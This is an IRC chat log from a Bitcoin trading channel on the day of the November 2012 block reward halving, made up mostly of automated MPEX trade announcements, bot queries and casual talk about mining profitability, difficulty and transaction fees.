04:49:26 [MPEX] [S.MPOE] 2345 @ 0.00052906 = 1.2406 BTC [+] Nov 28 04:49:27 [MPEX] [S.MPOE] 26555 @ 0.00052913 = 14.051 BTC [+] Nov 28 04:51:00 http://www.youtube.com/watch?NR=1&v=tTEyfNbcMgg == Diablo-D3 Nov 28 04:54:04 THE SERVER IS DOWN Nov 28 04:57:41 [MPEX] [S.MPOE] 2345 @ 0.00052684 = 1.2354 BTC [-] Nov 28 04:57:43 [MPEX] [S.MPOE] 15055 @ 0.00052652 = 7.9268 BTC [-] Nov 28 04:58:16 the fuck Nov 28 04:58:22 fuck I hate my tem sometimes **** BEGIN LOGGING AT Wed Nov 28 11:42:52 2012 Nov 28 11:43:58 [MPEX] [S.MPOE] 5856 @ 0.00052907 = 3.0982 BTC [-] Nov 28 11:43:58 [MPEX] [S.MPOE] 11044 @ 0.00052087 = 5.7525 BTC [-] Nov 28 11:47:23 [MPEX] [S.MPOE] 1000 @ 0.00053184 = 0.5318 BTC [+] Nov 28 11:47:24 [MPEX] [S.MPOE] 5100 @ 0.00053185 = 2.7124 BTC [+] Nov 28 11:55:11 [MPEX] [S.MPOE] 9910 @ 0.00053185 = 5.2706 BTC [+] Nov 28 11:55:13 [MPEX] [S.MPOE] 7100 @ 0.00053193 = 3.7767 BTC [+] Nov 28 11:55:14 [MPEX] [S.MPOE] 1000 @ 0.00053208 = 0.5321 BTC [+] Nov 28 11:55:15 [MPEX] [S.MPOE] 770 @ 0.00053209 = 0.4097 BTC [+] Nov 28 11:58:32 [MPEX] [S.MPOE] 15730 @ 0.00053209 = 8.3698 BTC [+] Nov 28 11:58:33 [MPEX] [S.MPOE] 4820 @ 0.00053211 = 2.5648 BTC [+] Nov 28 12:00:58 [MPEX] [S.MPOE] 19735 @ 0.00052186 = 10.2989 BTC [-] Nov 28 12:01:51 [MPEX] [S.MPOE] 5380 @ 0.00053211 = 2.8628 BTC [+] Nov 28 12:01:53 [MPEX] [S.MPOE] 25156 @ 0.00053215 = 13.3868 BTC [+] Nov 28 12:10:12 [MPEX] [S.MPOE] 18750 @ 0.0005252 = 9.8475 BTC [-] Nov 28 12:11:13 [MPEX] [S.DICE] 41 @ 0.0033273 = 0.1364 BTC [-] Nov 28 12:11:13 [MPEX] [S.DICE] 3953 @ 0.00332243 = 13.1336 BTC [-] Nov 28 12:11:15 [MPEX] [S.DICE] 1206 @ 0.00332186 = 4.0062 BTC [-] Nov 28 12:14:01 [MPEX] [S.MPOE] 7694 @ 0.00053215 = 4.0944 BTC [+] Nov 28 12:14:02 [MPEX] [S.MPOE] 906 @ 0.0005323 = 0.4823 BTC [+] Nov 28 12:17:12 [MPEX] [S.MPOE] 12450 @ 0.0005323 = 6.6271 BTC [+] Nov 28 12:24:48 [MPEX] [S.MPOE] 4550 @ 0.00053173 = 2.4194 BTC [-] Nov 28 12:27:28 [MPEX] [S.MPOE] 10800 @ 0.0005323 = 5.7488 BTC [+] Nov 28 12:28:17 http://www.dailygalaxy.com/my_weblog/2012/11/cerns-large-hadron-collider-reveals-new-type-of-matter.html Nov 28 12:28:19 dun dun dun Nov 28 12:32:28 [MPEX] [S.DICE] 700 @ 0.00333311 = 2.3332 BTC [+] Nov 28 12:46:29 [MPEX] [S.MPOE] 4744 @ 0.0005323 = 2.5252 BTC [+] Nov 28 12:46:30 [MPEX] [S.MPOE] 2343 @ 0.00053247 = 1.2476 BTC [+] Nov 28 12:50:43 [MPEX] [S.MPOE] 11217 @ 0.00053173 = 5.9644 BTC [-] Nov 28 12:50:45 [MPEX] [S.MPOE] 4565 @ 0.00052186 = 2.3823 BTC [-] Nov 28 12:50:46 [MPEX] [S.MPOE] 9079 @ 0.00052087 = 4.729 BTC [-] Nov 28 12:53:59 [MPEX] [S.MPOE] 2250 @ 0.00052087 = 1.172 BTC [-] Nov 28 12:54:01 [MPEX] [S.MPOE] 6250 @ 0.00052073 = 3.2546 BTC [-] Nov 28 12:56:42 [MPEX] [S.MPOE] 18800 @ 0.00052073 = 9.7897 BTC [-] Nov 28 12:56:44 [MPEX] [S.MPOE] 4774 @ 0.00052058 = 2.4852 BTC [-] Nov 28 13:00:25 [MPEX] [S.MPOE] 11026 @ 0.00052058 = 5.7399 BTC [-] Nov 28 13:00:26 [MPEX] [S.MPOE] 10104 @ 0.00051792 = 5.2331 BTC [-] Nov 28 13:07:54 [MPEX] [S.MPOE] 8446 @ 0.00051792 = 4.3744 BTC [-] Nov 28 13:07:55 [MPEX] [S.MPOE] 10650 @ 0.00051651 = 5.5008 BTC [-] Nov 28 13:07:57 [MPEX] [S.MPOE] 2654 @ 0.00051637 = 1.3704 BTC [-] Nov 28 13:12:36 [MPEX] [S.MPOE] 2010 @ 0.00051637 = 1.0379 BTC [-] Nov 28 13:12:37 [MPEX] [S.MPOE] 5390 @ 0.0005163 = 2.7829 BTC [-] Nov 28 13:19:39 [MPEX] [S.MPOE] 22218 @ 0.00051656 = 11.4769 BTC [+] Nov 28 13:30:03 [MPEX] [S.MPOE] 4432 @ 0.00051656 = 2.2894 BTC [+] Nov 28 13:31:46 [MPEX] [S.MPOE] 15799 @ 0.00052332 = 8.2679 BTC [+] Nov 28 13:32:24 [MPEX] [S.MPOE] 8500 @ 0.00052332 = 4.4482 BTC [+] Nov 28 13:35:31 [MPEX] [S.MPOE] 268 @ 0.00052261 = 0.1401 BTC [-] Nov 28 13:38:27 [MPEX] [S.MPOE] 11904 @ 0.00051651 = 6.1485 BTC [-] Nov 28 13:38:27 [MPEX] [S.MPOE] 2501 @ 0.00052332 = 1.3088 BTC [+] Nov 28 13:38:28 [MPEX] [S.MPOE] 6950 @ 0.00052632 = 3.6579 BTC [+] Nov 28 13:54:47 [MPEX] [S.MPOE] 12000 @ 0.00053116 = 6.3739 BTC [+] Nov 28 14:03:18 [MPEX] [S.MPOE] 12600 @ 0.00053116 = 6.6926 BTC [+] Nov 28 14:06:21 ;;later tell namjies since you asked for it, http://trilema.com/2012/advertising-on-digitalpoint/ Nov 28 14:06:21 The operation succeeded. **** BEGIN LOGGING AT Wed Nov 28 15:28:30 2012 Nov 28 15:42:13 i just got a brand new 5870 lol Nov 28 15:42:51 mazel tov Nov 28 15:43:11 was a responce to eskimobob Nov 28 15:43:14 [MPEX] [S.MPOE] 2345 @ 0.00052836 = 1.239 BTC [+] Nov 28 15:43:15 you lack context Nov 28 15:43:15 [MPEX] [S.MPOE] 5726 @ 0.00052854 = 3.0264 BTC [+] Nov 28 15:43:19 ;;halfreward Nov 28 15:43:20 Estimated time of bitcoin block reward halving: Wed Nov 28 15:13:20 2012 UTC | Time remaining: 1 hour, 30 minutes, and 0 seconds. Nov 28 15:46:32 [MPEX] [S.MPOE] 2345 @ 0.00052827 = 1.2388 BTC [-] Nov 28 15:46:33 [MPEX] [S.MPOE] 1805 @ 0.00052854 = 0.954 BTC [+] Nov 28 15:47:40 [MPEX] [S.MPOE] 11298 @ 0.00052854 = 5.9714 BTC [+] Nov 28 15:48:51 [MPEX] [S.MPOE] 630 @ 0.00052854 = 0.333 BTC [+] Nov 28 15:49:56 [MPEX] [S.MPOE] 10206 @ 0.00053119 = 5.4213 BTC [+] Nov 28 15:49:57 [MPEX] [S.MPOE] 8644 @ 0.00053287 = 4.6061 BTC [+] Nov 28 15:52:46 [MPEX] [S.MPOE] 16633 @ 0.00053287 = 8.8632 BTC [+] Nov 28 15:52:48 [MPEX] [S.MPOE] 17412 @ 0.00053298 = 9.2802 BTC [+] Nov 28 15:52:49 [MPEX] [S.MPOE] 12855 @ 0.00053309 = 6.8529 BTC [+] Nov 28 15:56:57 ;;halfreward Nov 28 15:56:58 Estimated time of bitcoin block reward halving: Wed Nov 28 15:16:58 2012 UTC | Time remaining: 1 hour, 20 minutes, and 0 seconds. Nov 28 16:01:00 [MPEX] [S.MPOE] 5464 @ 0.00052988 = 2.8953 BTC [-] Nov 28 16:02:31 Chaang-Noi: LTC mining :) Nov 28 16:02:55 i might, electric here is a bit high, and its hot Nov 28 16:03:04 thailand is not the best place in the world to mine :/ Nov 28 16:03:50 or PPC? I mined PPC for fun but mining is so pointless unless you have some serious hashing power Nov 28 16:05:46 I can only do about 355.0Mh/s and this is a joke :) Nov 28 16:07:40 [MPEX] [S.MPOE] 1406 @ 0.00052988 = 0.745 BTC [-] Nov 28 16:07:42 [MPEX] [S.MPOE] 15144 @ 0.00052742 = 7.9872 BTC [-] Nov 28 16:09:47 i might be able to hit 2 G Nov 28 16:10:03 but its not worth it cuz my cooling and electric costs :/ Nov 28 16:10:07 ;;halfreward Nov 28 16:10:08 Estimated time of bitcoin block reward halving: Wed Nov 28 15:10:08 2012 UTC | Time remaining: 1 hour and 0 seconds. Nov 28 16:10:20 ;;blocks Nov 28 16:10:20 209994 Nov 28 16:11:38 [MPEX] [S.MPOE] 16695 @ 0.00053309 = 8.8999 BTC [+] Nov 28 16:11:40 [MPEX] [S.MPOE] 3605 @ 0.0005331 = 1.9218 BTC [+] Nov 28 16:14:41 [MPEX] [S.MPOE] 2345 @ 0.00052769 = 1.2374 BTC [-] Nov 28 16:14:42 [MPEX] [S.MPOE] 6755 @ 0.00052742 = 3.5627 BTC [-] Nov 28 16:18:52 coinotrons Profitability calculator will show something funny in about 55 min Nov 28 16:19:41 and if I am correct, this will switch lotsof miners over to LTC or PPC Nov 28 16:20:12 at least they used to have automatic switching Nov 28 16:21:07 BTC 33.0 GH, PPC 46.7 GH, LTC 85.4 MH Nov 28 16:21:38 [MPEX] [S.MPOE] 2345 @ 0.00052764 = 1.2373 BTC [+] Nov 28 16:21:39 [MPEX] [S.MPOE] 2274 @ 0.00052742 = 1.1994 BTC [-] Nov 28 16:21:40 [MPEX] [S.MPOE] 881 @ 0.00052399 = 0.4616 BTC [-] Nov 28 16:24:48 ;;halfreward Nov 28 16:24:48 Estimated time of bitcoin block reward halving: Wed Nov 28 15:24:49 2012 UTC | Time remaining: 1 hour and 0 seconds. Nov 28 16:26:33 hey ukto Nov 28 16:26:51 wazaup Nov 28 16:27:29 block party:) Nov 28 16:27:46 i found a nice one.. but its like a standard stock graph, uses a plot point per day Nov 28 16:27:52 i think ppl want actual trades Nov 28 16:28:14 the one that will zoom and do a full per-trades, is nice, but doesnt load on mobile Nov 28 16:28:41 [MPEX] [S.MPOE] 2345 @ 0.00053307 = 1.25 BTC [+] Nov 28 16:28:42 [MPEX] [S.MPOE] 23005 @ 0.0005331 = 12.264 BTC [+] Nov 28 16:28:44 [MPEX] [S.MPOE] 6458 @ 0.00053332 = 3.4442 BTC [+] Nov 28 16:31:26 because this is going to be a sad day for most of the miners, I recommend you to send me your first mined coin. Then at least someone is happy -> 15WLztstXkfybemi9Ecd9FQ4vt6wiJjN6b .. and you will feel better too ... LOL Nov 28 16:32:37 ;;halfreward Nov 28 16:32:37 Estimated time of bitcoin block reward halving: Wed Nov 28 15:12:38 2012 UTC | Time remaining: 40 minutes and 0 seconds. Nov 28 16:32:50 ;;blocks Nov 28 16:32:50 209996 Nov 28 16:33:12 [MPEX] [S.MPOE] 2345 @ 0.00052433 = 1.2296 BTC [-] Nov 28 16:33:14 [MPEX] [S.MPOE] 17505 @ 0.00052399 = 9.1724 BTC [-] Nov 28 16:37:29 [MPEX] [S.MPOE] 2345 @ 0.00053305 = 1.25 BTC [+] Nov 28 16:37:30 [MPEX] [S.MPOE] 6342 @ 0.00053332 = 3.3823 BTC [+] Nov 28 16:37:32 [MPEX] [S.MPOE] 7928 @ 0.00053336 = 4.2285 BTC [+] Nov 28 16:37:32 [MPEX] [S.MPOE] 325 @ 0.00053362 = 0.1734 BTC [+] Nov 28 16:41:46 I bet, out there is a pervert or two who are going to whip themselves with LAN cables on that sad sad day Nov 28 16:41:58 ;;halfreward Nov 28 16:41:59 Estimated time of bitcoin block reward halving: Wed Nov 28 15:11:59 2012 UTC | Time remaining: 30 minutes and 0 seconds. Nov 28 16:48:26 [MPEX] [S.MPOE] 2345 @ 0.00052793 = 1.238 BTC [-] Nov 28 16:48:27 [MPEX] [S.MPOE] 22700 @ 0.00052784 = 11.982 BTC [-] Nov 28 16:48:28 [MPEX] [S.MPOE] 5655 @ 0.00052399 = 2.9632 BTC [-] Nov 28 16:51:05 oh, still 3 blocks to go? Nov 28 16:54:14 ;;blocks Nov 28 16:54:14 209997 Nov 28 16:57:35 3 to go Nov 28 16:57:47 tick fkn tack ... Nov 28 16:57:56 and we all are fkt Nov 28 17:00:03 2 to go Nov 28 17:02:06 and the the blchain gets forked and puff... it's all gone Nov 28 17:02:29 ;;bc,stats Nov 28 17:02:31 Current Blocks: 209999 | Current Difficulty: 3438908.9601591 | Next Difficulty At Block: 211679 | Next Difficulty In: 1680 blocks | Next Difficulty In About: 1 week, 3 days, 19 hours, 56 minutes, and 0 seconds | Next Difficulty Estimate: 3713945.01025181 | Estimated Percent Change: 7.9977706092 Nov 28 17:02:49 7.9977706092 FUCK! Nov 28 17:03:06 so, 300% this year? Nov 28 17:03:20 i think diff will drop Nov 28 17:03:34 [MPEX] [S.MPOE] 28700 @ 0.00053321 = 15.3031 BTC [+] Nov 28 17:03:36 [MPEX] [S.MPOE] 298 @ 0.00053013 = 0.158 BTC [-] Nov 28 17:03:37 I bet no one predicted that in March Nov 28 17:03:50 not even in June Nov 28 17:05:02 eskimo, no cigar? Nov 28 17:06:13 sure, I love Cuban sigars Nov 28 17:06:22 *cigars Nov 28 17:06:42 no you did not! jurov Nov 28 17:06:46 i'm in a different kind of "mining", tho. Nov 28 17:06:52 that was just a joke Nov 28 17:07:06 but thank, I'll name it "jurov" Nov 28 17:07:43 [MPEX] [S.MPOE] 34313 @ 0.00053013 = 18.1904 BTC [-] Nov 28 17:07:44 [MPEX] [S.MPOE] 2087 @ 0.00052735 = 1.1006 BTC [-] Nov 28 17:08:47 dun dun dun xD Nov 28 17:10:53 at least for you the waiting is over Nov 28 17:11:16 for me the day D is the Last Friday 30th Nov 28 17:14:06 ok i played some SD in last block Nov 28 17:14:08 won some change Nov 28 17:18:21 ;;tslb Nov 28 17:18:25 Time since last block: 16 minutes and 46 seconds Nov 28 17:19:19 [MPEX] [S.MPOE] 2200 @ 0.00052735 = 1.1602 BTC [-] Nov 28 17:19:36 oh no all by bitcoind's just segfaulted !!! Nov 28 17:19:42 *jokes* Nov 28 17:22:34 www.soundcloud.com/djleo Bitcoin songs Nov 28 17:23:49 [MPEX] [S.MPOE] 2345 @ 0.00053356 = 1.2512 BTC [+] Nov 28 17:23:51 [MPEX] [S.MPOE] 8555 @ 0.00053362 = 4.5651 BTC [+] Nov 28 17:27:04 it's here, blockchain.info has fireworks Nov 28 17:27:13 [MPEX] [S.MPOE] 2345 @ 0.00052767 = 1.2374 BTC [-] Nov 28 17:27:15 [MPEX] [S.MPOE] 13574 @ 0.00052735 = 7.1582 BTC [-] Nov 28 17:29:35 yup Nov 28 17:29:35 http://blockchain.info/block-index/322335/000000000000048b95347e83192f69cf0366076336c639f9b7228e9ba171342e Nov 28 17:29:37 slush got it Nov 28 17:30:43 [MPEX] [S.MPOE] 2345 @ 0.00053328 = 1.2505 BTC [+] Nov 28 17:30:44 [MPEX] [S.MPOE] 24802 @ 0.00053362 = 13.2348 BTC [+] Nov 28 17:31:29 :) Nov 28 17:31:58 [MPEX] [S.MPOE] 2345 @ 0.00052754 = 1.2371 BTC [-] Nov 28 17:31:59 [MPEX] [S.MPOE] 5305 @ 0.00052735 = 2.7976 BTC [-] Nov 28 17:34:47 [MPEX] [S.MPOE] 7234 @ 0.00052735 = 3.8148 BTC [-] Nov 28 17:34:47 [MPEX] [S.MPOE] 15166 @ 0.00052733 = 7.9975 BTC [-] Nov 28 17:35:34 hey IBB fans: https://cryptostocks.com/securities/28 Nov 28 17:37:49 [MPEX] [S.MPOE] 2345 @ 0.00053331 = 1.2506 BTC [+] Nov 28 17:37:51 [MPEX] [S.MPOE] 23918 @ 0.00053362 = 12.7631 BTC [+] Nov 28 17:37:52 [MPEX] [S.MPOE] 5529 @ 0.00053364 = 2.9505 BTC [+] Nov 28 17:40:34 well Nov 28 17:40:35 [MPEX] [S.MPOE] 2345 @ 0.0005333 = 1.2506 BTC [-] Nov 28 17:40:36 [MPEX] [S.MPOE] 4105 @ 0.00053364 = 2.1906 BTC [+] Nov 28 17:40:42 i havent even been able to get sanz to reply to me Nov 28 17:50:11 pigeons are you interested in buying TRC, or did you just want a few coins for the novelty? Nov 28 17:50:41 [MPEX] [S.MPOE] 16266 @ 0.00053364 = 8.6802 BTC [+] Nov 28 17:50:42 [MPEX] [S.MPOE] 12534 @ 0.00053372 = 6.6896 BTC [+] Nov 28 17:51:45 [MPEX] [S.MPOE] 7612 @ 0.00053372 = 4.0627 BTC [+] Nov 28 17:52:26 yes and yes Nov 28 17:54:25 [MPEX] [S.MPOE] 7124 @ 0.00053372 = 3.8022 BTC [+] Nov 28 17:54:26 [MPEX] [S.MPOE] 15620 @ 0.0005339 = 8.3395 BTC [+] Nov 28 17:55:57 lol Nov 28 18:03:34 ;;halfreward Nov 28 18:03:35 Estimated time of bitcoin block reward halving: Fri Nov 25 23:33:36 2016 UTC | Time remaining: 3 years, 51 weeks, 6 days, 7 hours, 30 minutes, and 0 seconds. Nov 28 18:03:42 LOL Nov 28 18:03:48 it halved while I was asleep! Nov 28 18:03:50 ;;ticker Nov 28 18:03:51 BTCUSD ticker | Best bid: 12.31595, Best ask: 12.31596, Bid-ask spread: 0.00001, Last trade: 12.31596, 24 hour volume: 28954.59343935, 24 hour low: 11.91301, 24 hour high: 12.40712, 24 hour vwap: 12.21012 Nov 28 18:03:59 let the volatility begin Nov 28 18:04:55 what volatility? like, halfreward should cause eveyone to run around like chicken? Nov 28 18:12:09 [MPEX] [S.MPOE] 11080 @ 0.0005339 = 5.9156 BTC [+] Nov 28 18:12:11 [MPEX] [S.MPOE] 6172 @ 0.00053397 = 3.2957 BTC [+] Nov 28 18:12:12 [MPEX] [S.MPOE] 1648 @ 0.00053419 = 0.8803 BTC [+] Nov 28 18:12:37 ;;bc,stats Nov 28 18:12:39 Current Blocks: 210003 | Current Difficulty: 3438908.9601591 | Next Difficulty At Block: 211679 | Next Difficulty In: 1676 blocks | Next Difficulty In About: 1 week, 3 days, 21 hours, 10 minutes, and 36 seconds | Next Difficulty Estimate: 3690038.19454093 | Estimated Percent Change: 7.30258454909 Nov 28 18:13:08 i did a survey of a few miners Nov 28 18:13:10 not the big ones Nov 28 18:13:49 they do this quarterly liquidation thing Nov 28 18:14:02 but with half reward some of them just want out Nov 28 18:14:27 so you may see a spike in trade volume soon which I suppose would cause volatility Nov 28 18:14:46 how do we know you're not just pulling our strings? Nov 28 18:15:58 [MPEX] [S.MPOE] 2345 @ 0.00052739 = 1.2367 BTC [-] Nov 28 18:16:00 [MPEX] [S.MPOE] 7134 @ 0.00052733 = 3.762 BTC [-] Nov 28 18:16:00 [MPEX] [S.MPOE] 7100 @ 0.00052453 = 3.7242 BTC [-] Nov 28 18:19:50 [MPEX] [S.MPOE] 1171 @ 0.00052427 = 0.6139 BTC [-] Nov 28 18:19:52 [MPEX] [S.MPOE] 17660 @ 0.00053419 = 9.4338 BTC [+] Nov 28 18:20:03 http://shrani.si/f/3N/bx/4wJj9lov/btchehe.png Nov 28 18:20:04 hehe Nov 28 18:20:22 [MPEX] [S.MPOE] 2345 @ 0.00053405 = 1.2523 BTC [-] Nov 28 18:20:23 [MPEX] [S.MPOE] 5105 @ 0.00053419 = 2.727 BTC [+] Nov 28 18:20:27 bout 2.5 times normal traffic? :) Nov 28 18:22:38 https://btcjam.com/listings/734 Nov 28 18:23:29 hmm? Nov 28 18:25:22 just interesting. i want to start a risky biz, "totally anonymous" cards, i'm disabled and unemployed, can't get my paperwork to verify Nov 28 18:25:32 i'm sure it's fine, just interesting to me Nov 28 18:29:58 !ticker Nov 28 18:29:59 Provide ticker. Nov 28 18:30:10 ;;ticker Nov 28 18:30:10 BTCUSD ticker | Best bid: 12.22302, Best ask: 12.31997, Bid-ask spread: 0.09695, Last trade: 12.31997, 24 hour volume: 28072.54106340, 24 hour low: 11.91301, 24 hour high: 12.40712, 24 hour vwap: 12.21514 Nov 28 18:30:22 ;;halfreward Nov 28 18:30:23 Estimated time of bitcoin block reward halving: Fri Nov 25 23:50:24 2016 UTC | Time remaining: 3 years, 51 weeks, 6 days, 7 hours, 20 minutes, and 0 seconds. Nov 28 18:30:37 ahh it happened already Nov 28 18:31:47 \o/ Nov 28 18:32:11 never got my block :< Nov 28 18:38:34 you tried to send on block 210000? Nov 28 18:39:04 (08:33) < tyfaust> Block 210000: Generation: 25 + 13.56295554 total fees.... why so much in fees? It is the most I have seen in fees for any block. Nov 28 18:39:18 ^^^ sounds like many people tried to send there to sign the block or something Nov 28 18:39:44 lies Nov 28 18:40:33 jcpham: *shrug* they're talking about that in #bitcoin-otc Nov 28 18:41:08 nuh uh Nov 28 18:41:26 haha Nov 28 18:41:42 [MPEX] [S.DICE] 918 @ 0.00336718 = 3.0911 BTC [+] Nov 28 18:47:42 !ticker S.MPOE Nov 28 18:47:43 [MPEX:S.MPOE] 1day: 0.00051221 / 0.0005251 / 0.00053419 (3704533 shares, 1,945.27 BTC), 30day: 0.00045734 / 0.00050251 / 0.0005386 (84430956 shares, 42,427.83 BTC) Nov 28 18:52:23 copumpkin: that directly relates to the sort of business in question Nov 28 18:53:19 CFO is for is the main 'thing' that the business makes money at Nov 28 18:53:42 CFO for TacoBell is selling tacos, not making interest on their cash balance Nov 28 18:54:00 CFF is most anything related to how the company raised money Nov 28 18:54:44 [MPEX] [S.MPOE] 2345 @ 0.00053034 = 1.2436 BTC [-] Nov 28 18:54:45 [MPEX] [S.MPOE] 12555 @ 0.00053 = 6.6542 BTC [-] Nov 28 18:56:33 also, there's trickyness in that you receive dividens from others in cfo, but you pay your difidends in cff Nov 28 18:59:45 oh, and interest is cfo on both sides, i think, because you didn't *raise* money by taking a loan Nov 28 18:59:49 you bought it Nov 28 19:02:38 mr. smickles Nov 28 19:03:18 ;;bc diff Nov 28 19:03:18 Error: "bc" is not a valid command. Nov 28 19:03:28 ;;diff Nov 28 19:03:29 3438908.9601591383 Nov 28 19:03:44 [MPEX] [S.MPOE] 2345 @ 0.00053409 = 1.2524 BTC [+] Nov 28 19:03:45 [MPEX] [S.MPOE] 1237 @ 0.00053419 = 0.6608 BTC [+] Nov 28 19:03:46 [MPEX] [S.MPOE] 4018 @ 0.00053421 = 2.1465 BTC [+] Nov 28 19:10:35 [MPEX] [S.MPOE] 4232 @ 0.00053421 = 2.2608 BTC [+] Nov 28 19:10:36 [MPEX] [S.MPOE] 14050 @ 0.00053435 = 7.5076 BTC [+] Nov 28 19:10:38 [MPEX] [S.MPOE] 2326 @ 0.00053452 = 1.2433 BTC [+] Nov 28 19:12:40 [MPEX] [S.MPOE] 2345 @ 0.00053016 = 1.2432 BTC [-] Nov 28 19:12:42 [MPEX] [S.MPOE] 10545 @ 0.00053 = 5.5889 BTC [-] Nov 28 19:12:42 [MPEX] [S.MPOE] 7990 @ 0.00052807 = 4.2193 BTC [-] Nov 28 19:18:39 howdy thestringpuller :) Nov 28 19:19:07 ;;halfreward Nov 28 19:19:08 Estimated time of bitcoin block reward halving: Fri Nov 25 23:09:09 2016 UTC | Time remaining: 3 years, 51 weeks, 6 days, 5 hours, 50 minutes, and 0 seconds. Nov 28 19:19:17 how about that Nov 28 19:19:19 yeah its already passed Nov 28 19:19:27 I switched back to mining on p2pool Nov 28 19:21:47 [MPEX] [S.DICE] 1900 @ 0.00334633 = 6.358 BTC [-] Nov 28 19:24:47 how good are at 3D programming senor smickles? Nov 28 19:25:43 I dunno, closest i've come is minecraft mods. Nov 28 19:26:09 blocks on blocks on blocks Nov 28 19:26:20 racks on racks on racks? Nov 28 19:26:25 racks on racks? Nov 28 19:26:27 that's what I expect mircea to have in his house Nov 28 19:26:32 stacks on stacks on stacks Nov 28 19:26:33 stacks of cash Nov 28 19:27:08 ima start callin' him da rubberband man Nov 28 19:27:19 bandz a' make her dance Nov 28 19:27:19 bandz a' make her dance Nov 28 19:27:26 bacon cooked in butter, eggs drenchen in shrirasha Nov 28 19:28:07 lol, rubberband man Nov 28 19:29:04 cause he poppin dem bandz when he go to the club Nov 28 19:29:09 make dem bitchez dance Nov 28 19:29:29 Diablo-D3: why'd you switch away from p2pool in the first place? Nov 28 19:29:59 can you do sqrt with gribble? Nov 28 19:30:02 smickles: solo mining Nov 28 19:30:06 ;;calc sqrt(2) Nov 28 19:30:06 1.41421356237 Nov 28 19:30:07 ah Nov 28 19:30:09 sweet Nov 28 19:30:13 wanted to see if I could get a block in before the reward half Nov 28 19:30:18 oh Nov 28 19:30:30 any luck? Nov 28 19:30:45 nope :< Nov 28 19:30:59 ;;ticker Nov 28 19:31:00 BTCUSD ticker | Best bid: 12.29999, Best ask: 12.30000, Bid-ask spread: 0.00001, Last trade: 12.30000, 24 hour volume: 28132.92143566, 24 hour low: 11.91301, 24 hour high: 12.40712, 24 hour vwap: 12.22246 Nov 28 19:31:27 so... we can at least saw it wasn't a suddent reaction to the reward drop Nov 28 19:31:40 *sudden Nov 28 19:33:34 maybe the effect will be that the asks just don't fill in like they used to over time Nov 28 19:34:17 that will be gradual though Nov 28 19:34:58 bleh Nov 28 19:37:16 if the world ends on the 21st I'ma be mad for the sole reason I didn't get to play GTA V Nov 28 19:37:41 oh, it means we have a rational market which already fully priced in the reward change @.@ Nov 28 19:38:08 _if_? Nov 28 19:38:16 :P Nov 28 19:38:20 you think there is any significant chance? Nov 28 19:38:33 Y2K mang Nov 28 19:38:41 totally Nov 28 19:38:45 :) Nov 28 19:38:47 we were boned by that Nov 28 19:38:53 we had to rebuild Nov 28 19:38:58 from the ground up Nov 28 19:39:53 some miners I talked to stated they were exiting the mining game after the reward drop cause the ROI is too high for the equipment Nov 28 19:40:13 too long* Nov 28 19:41:16 perhaps it will be harder to get transactions quickly into blocks since miners will demand more network fees Nov 28 19:42:02 have any pool announced that tho? Nov 28 19:42:06 surely they would Nov 28 19:42:33 not on a large scale, this was a small sample set Nov 28 19:42:38 like 3-4 miners when I had freetime Nov 28 19:42:56 the whole exiting the game Nov 28 19:43:35 so it will likely be harder to enter the mining realm now than it was before Nov 28 19:43:41 ).( woops, i read that as exicted Nov 28 19:44:06 maybe the majority will stick it out Nov 28 19:44:16 [MPEX] [S.MPOE] 24500 @ 0.00052826 = 12.9424 BTC [+] Nov 28 19:44:17 [MPEX] [S.MPOE] 1000 @ 0.00053451 = 0.5345 BTC [+] Nov 28 19:44:18 [MPEX] [S.MPOE] 3200 @ 0.00053452 = 1.7105 BTC [+] Nov 28 19:44:20 I wonder if enough are exiting that the diff won't drop fast enough Nov 28 19:44:55 won't asic equipment entering the mainstream correct that drop though? Nov 28 19:45:26 but it's not here yet Nov 28 19:45:58 any time the diff can't drop fast enough, we'll see 1hr+ blocks all the f'ing time Nov 28 19:46:15 heh Nov 28 19:46:36 and i don't care if the asics come the next day Nov 28 19:46:44 maybe there is something to the prediction of transaction fees increasing every reward drop Nov 28 19:46:44 one day of 1 hour blocks will suck Nov 28 19:47:06 that would be grounds for miners to exclude a lot of transaction Nov 28 19:47:10 transactions* Nov 28 19:48:46 if there are an average of 200 txns in a block, they't have to pay .125 btc to make up for the reward drop Nov 28 19:49:06 yea but if you have a 1 hour block Nov 28 19:49:17 oh, so divide by 6 Nov 28 19:49:19 that's 6 times the txn's Nov 28 19:49:33 so out of 1200 average txn's Nov 28 19:49:38 only 200 will make it i Nov 28 19:49:40 in* Nov 28 19:50:17 the fees will likely not go up to .125 Nov 28 19:51:03 but I would bet that out of these 200 hypothetical transactions, 99% of them would have paid some kind of miner's fee Nov 28 19:51:24 http://bitcoin.sipa.be/speed-small-lin-2k.png << we're not seeing a drop yet tho Nov 28 19:52:05 ;;calc 200 * .0005 Nov 28 19:52:05 0.1 Nov 28 19:52:47 ;;calc 200 * (.3 / [ticker --last]) Nov 28 19:52:47 4.90196078431 Nov 28 19:52:59 ;;calc (.3 / [ticker --last]) Nov 28 19:52:59 0.0245098039216 Nov 28 19:54:02 [MPEX] [F.GIGA.ETF] 1001 @ 0.00000001 BTC [-] Nov 28 19:54:11 !!! Nov 28 19:54:20 17:54 <@assbot> [MPEX] [F.GIGA.ETF] 1001 @ 0.00000001 BTC [-] Nov 28 19:55:43 [MPEX] [S.MPOE] 2345 @ 0.00052847 = 1.2393 BTC [-] Nov 28 19:55:45 [MPEX] [S.MPOE] 26278 @ 0.00052813 = 13.8782 BTC [-] Nov 28 19:55:46 [MPEX] [S.MPOE] 4260 @ 0.00052807 = 2.2496 BTC [-] Nov 28 19:55:47 [MPEX] [S.MPOE] 15900 @ 0.00052679 = 8.376 BTC [-] Nov 28 19:55:49 [MPEX] [S.MPOE] 317 @ 0.00052469 = 0.1663 BTC [-] Nov 28 19:56:22 profitability PPC 1.89 , LTC 2.09 Nov 28 19:56:35 BTC 33.0 GH, PPC 46.7 GH, LTC 85.4 MH Nov 28 19:56:44 ppc? Nov 28 19:56:51 BTC 31.4 GH PPC 128.1 GH LTC 138.7 MH Nov 28 19:57:10 Diablo-D3: ppc? this is the new BTC ;) Nov 28 19:57:23 no I mean, what is it Nov 28 20:05:50 GIGA.ETF is still around? Nov 28 20:06:59 http://polimedia.us/bitcoin/mpex.php?mpsic=F.GIGA.ETF Nov 28 20:07:12 [MPEX] [S.MPOE] 6450 @ 0.00052565 = 3.3904 BTC [+] Nov 28 20:07:14 [MPEX] [S.MPOE] 11050 @ 0.00052699 = 5.8232 BTC [+] Nov 28 20:10:02 so EskimoBob you're mining ltc then? Nov 28 20:10:24 smickles: whatever happened to the usagi saga Nov 28 20:10:36 thestringpuller: i'm sure he's still going insane Nov 28 20:10:48 whoa Nov 28 20:11:02 he was going on and on 